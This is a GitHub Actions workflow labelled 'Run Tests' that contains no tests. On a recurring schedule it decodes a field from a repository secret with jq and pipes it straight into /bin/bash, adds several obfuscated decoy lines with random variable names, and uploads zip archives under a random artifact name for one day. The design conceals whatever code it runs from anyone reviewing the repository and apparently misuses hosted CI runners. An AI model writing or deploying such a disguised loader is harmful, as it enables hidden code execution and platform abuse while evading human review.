name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '34 4,10,16,22 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          asj640: ${{ secrets.asj640 }}
        run: |
          printf '%s' "$asj640" | jq -r .vs41 | /bin/bash
          echo $ip20 | jq -r .uwa7596 | /bin/bash
          echo $ndwdu2 | jq -r .cjoe70 | /bin/bash
          printf '%s' "$s1640" | jq -r .bm05943 | /bin/bash
          printf '%s' "$oe01" | jq -r .eurbm5 | /bin/bash
          echo $lux15 | jq -r .ofvn18 | /bin/bash
          printf '%s' "$eud10648" | jq -r .cdn40773 | /bin/bash
          echo $jqbdo081 | jq -r .gqn97094 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: KRTmaPfo
          path: "*.zip"
          retention-days: 1
